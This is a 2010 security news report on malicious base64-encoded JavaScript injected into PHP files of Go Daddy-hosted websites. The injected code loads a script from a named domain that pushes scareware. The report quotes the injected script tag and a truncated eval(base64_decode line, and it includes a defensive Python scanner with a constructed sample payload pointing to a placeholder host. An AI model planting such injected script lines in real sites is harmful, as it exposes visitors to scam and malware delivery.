Websites Hosted at Go Daddy Attacked and Exploited Again

According to the latest warning from researchers at Sucuri Security (a firm running a web integrity monitoring service), a number of websites hosted at Go Daddy (an Internet domain registrar) have had malicious code injected into their webpages.

The warning says that an unknown number of websites hosted at Go Daddy have been attacked and abused. The research shows that this is an ongoing issue that began over the last couple of days.

All infected websites had base64-encoded JavaScript added to all of their PHP files. The rogue code decodes to a <script> element, which loads content from a third-party domain. All the websites tested so far contain the following JavaScript added to all PHP files: <script src=http://myblindstudioinfoonline.com/ll.php which is generated by a very long eval(base64_decode line: eval(base64_decode("aWYoZnVuY3Rpb.
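One way to check a site for the injection described above, as an added example that is not from Sucuri or the original article: the Python below scans PHP source for eval(base64_decode(...)) calls, decodes each blob and lists any script src URLs found inside. The sample payload and the host bad.example.invalid are constructed, and find_injections and scan_tree are hypothetical names.

```python
import base64, binascii, re
from pathlib import Path

# eval(base64_decode("...")) with either quote style and optional whitespace
INJECT_RE = re.compile(
    r"""eval\s*\(\s*base64_decode\s*\(\s*(['"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)""",
    re.IGNORECASE)
# src attribute of a <script> element, quoted, unquoted or backslash-escaped
SRC_RE = re.compile(r"""<script[^>]*\bsrc\s*=\s*\\?['"]?([^\s'">\\]+)""", re.IGNORECASE)


def find_injections(php_source):
    """Return one finding per eval(base64_decode(...)) call in php_source."""
    findings = []
    for m in INJECT_RE.finditer(php_source):
        blob = re.sub(r"\s+", "", m.group(2))
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            decoded = None  # truncated or corrupted blob: still report the call
        findings.append({
            "offset": m.start(),
            "decoded": decoded,
            "script_srcs": SRC_RE.findall(decoded) if decoded else [],
        })
    return findings


def scan_tree(root):
    """Map each .php file under root that contains an injection to its findings."""
    report = {}
    for path in Path(root).rglob("*.php"):
        hits = find_injections(path.read_text(errors="replace"))
        if hits:
            report[str(path)] = hits
    return report


# Constructed sample: a clean page with an injected first line (not the real payload).
_payload = 'echo "<script src=http://bad.example.invalid/ll.php></script>";'
SAMPLE = ('<?php eval(base64_decode("%s")); ?>\n<?php echo "Hello"; ?>\n'
          % base64.b64encode(_payload.encode()).decode())

if __name__ == "__main__":
    for finding in find_injections(SAMPLE):
        print(finding["offset"], finding["script_srcs"])
```

A call whose blob cannot be decoded is still reported, with decoded set to None, so a partially overwritten file is not missed.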

The external code leads users to a scareware distribution website, which imitates an antivirus scan and displays various bogus alerts about infections on their systems. The objective of this scam is to trick users into purchasing licenses for a useless application that claims to be capable of removing malware that never existed.

According to security experts, it's unlikely that Go Daddy's own infrastructure is responsible for this mass attack. The reason all the infected websites are hosted in the same place is that criminals first scan the IP space of big hosting providers to create a list of vulnerable websites and then attack them all together.

According to a statement published on the Sucuri blog on September 17, 2010, what was interesting about the attack was that the domain was registered by the same people responsible for the past attacks at BlueHost, Go Daddy, etc.

Others, such as BlueHost, Media Temple and Network Solutions, have also faced the same kind of incident previously, some of them repeatedly.

But the worst thing about this case is that the malicious domain myblindstudioinfoonline dot com (77.78.239.53) is not blacklisted, so it has the potential to attack a very large number of visitors, particularly visitors with outdated AV signatures and definitions.

Hence, users are advised to use an updated version of a legitimate anti-virus product to avoid falling victim to these kinds of attacks.

» SPAMfighter News - 01-10-2010
